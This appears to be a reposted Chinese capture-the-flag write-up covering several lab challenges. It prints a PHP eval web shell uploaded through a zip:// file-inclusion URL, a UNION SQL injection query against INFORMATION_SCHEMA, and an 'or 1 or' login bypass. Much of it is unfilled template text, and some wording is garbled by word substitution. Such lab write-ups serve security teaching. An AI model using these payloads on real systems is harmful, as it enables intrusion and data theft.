安全杂项
1.包罗万象包罗万象
题目内容:
有一天,小吉发现在网上探求好用的网盘,这时间他发现了这么一个网站。
题目分析:
对题目进行深入的分析,包括理解题目标要求、查找相关的资料、分析题目所涉及的技术或概念等。
解题过程:创建一个txt文件,写入<?php @eval($_POST['a']);?>,打包压缩成zip文件,上传得到其在服务器内的保存地点,然后粘贴到url=的后面写作http://192.168.210.79/index.php?url=zip:///var/www/html/upload/10569a05941f378d2dcf16da94101ec2.zip%23everything,然后enter,之后将链接粘贴进菜刀就可以跑出
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
2.题目形貌:
白云新闻搜刮
题目分析:
中国又出现了一个搜刮巨头!据报道,中国网络大亨小明近日编写了一个搜刮引擎,叫白云新闻搜刮,具体链接在下方,该搜刮链接功能欠打,界面乏力,小明出一包辣条悬赏毛病,豪言入侵高手都去试试,你服不平?不平就去试试呗~(答案为flag{}形式,提交{}中内容即可)
IP信息:192.168.210.71
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
首先关js,刷新后可以绕过字符验证,之后用sql语句慢慢试探,先查找sql默认文件,比如:
1、TABLE_SCHEMA:数据库实例名称;
2、TABLE_NAME:数据存放对象表名称;
3、TABLE_TYPE:数据存放对象范例(表或视图);
4、TABLE_ROWS:数据量;
5、COLUMN_NAME:字段名称
6、COLUMN_COMMENT:字段解释
7、COLUMN_TYPE:字段范例
' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA--'
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
admin123456
题目分析:
入门级入侵,你以为就如许你就能得分了?太鄙视admin 了。(答案为flag{}形式,提交{}中内容即可)IP信息:192.168.210.74
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
先关jsp,然后两个’or 1 or’,enter就完了
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
我的生日
题目分析:
没耳朵的的猫,大家都喜欢,因为小口袋有许多多少东西。但是你知道他的生日么?(答案为flag{}形式,提交{}中内容即可)
IP信息:192.168.210.76
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
去网上搜哆啦A梦的生日,输入生日和验证码就完了
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
似乎有机密
题目分析:
这个word文件的内容看起来似乎有啥机密,解开看看吧
http://192.168.210.21/adl-oss/resources/ab19328c13074a1c80a87ec39bbdd389?token=400cc9e0-4adb-4ee9-97f3-eff540e20274&fileName&fileType=download
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
管理员的愤怒
题目分析:
阿水是某部分的网站管理员,一天他发现自己管理的网站被挂上了暗链,链接指向了一个IP。阿水非常愤怒,表示一定要给点对方颜色看看,但是这小子没学过渗透。下面给各位这个IP,看大家如何进入坏蛋的网站获得flag为阿水报仇。
IP信息:192.168.210.78
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
在db.phps文件中有数据库密码,下载打开,查看
在打开网页http://192.168.210.78/dbadmin登录,找到flag
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
隐藏的钥匙
题目分析:
路飞一行人千辛万苦来到了巨大航道的终点,找到了传说中的One piece,但是必要钥匙才气打开One Piece大门,钥匙就隐藏在下面的图片中,聪明的你能帮路飞拿到钥匙,打开One
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
将字符用base64剖析
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 | 
